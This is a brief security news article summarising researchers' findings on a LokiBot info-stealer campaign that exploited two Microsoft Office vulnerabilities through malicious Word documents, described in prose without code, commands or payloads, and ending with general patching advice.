FortiGuard Labs recently came across a new LokiBot campaign that exploited a pair of well-known vulnerabilities in Microsoft Office documents. The campaign first came to light in May while researchers were investigating two types of Word documents.
Diving into details
According to researchers, threat actors exploited two remote code execution vulnerabilities, tracked as CVE-2021-40444 and CVE-2022-30190, to embed malicious macros within Microsoft documents.
Initially, the attack was launched using the Word documents impacted by CVE-2021-40444. The document contained a file “document.xml.rels” and an MHTML link. Execution of this file caused the deployment of file exploits for the second vulnerability.
Toward the end of May, the attackers changed their tactic by embedding a VBA script within the Word document.
The VBA script created an INF file to load a DLL file that downloaded a second-stage code injector from a URL.
The injector incorporates various evasion techniques to enable the attackers to execute LokiBot malware in the final stage.
About the Lokibot version used
Upon analyzing the C2 traffic, researchers determined that the version of Lokibot used in the campaign includes MD5 hash.
This hash serves as a mutex to ensure that multiple instances of the malware are not running simultaneously.
Lokibot, a persistent and widespread malware, continues to dominate the threat landscape as its operators evolve their propagation methods. In this campaign, the info-stealer managed to spread by exploiting old vulnerabilities. Therefore, organizations must ensure that they are using the latest version of Microsoft Office documents. It is also crucial to stay informed about cybercriminals' latest tactics and techniques to implement strong security measures. This is where solutions boosting real-time cyber situational awareness come into play.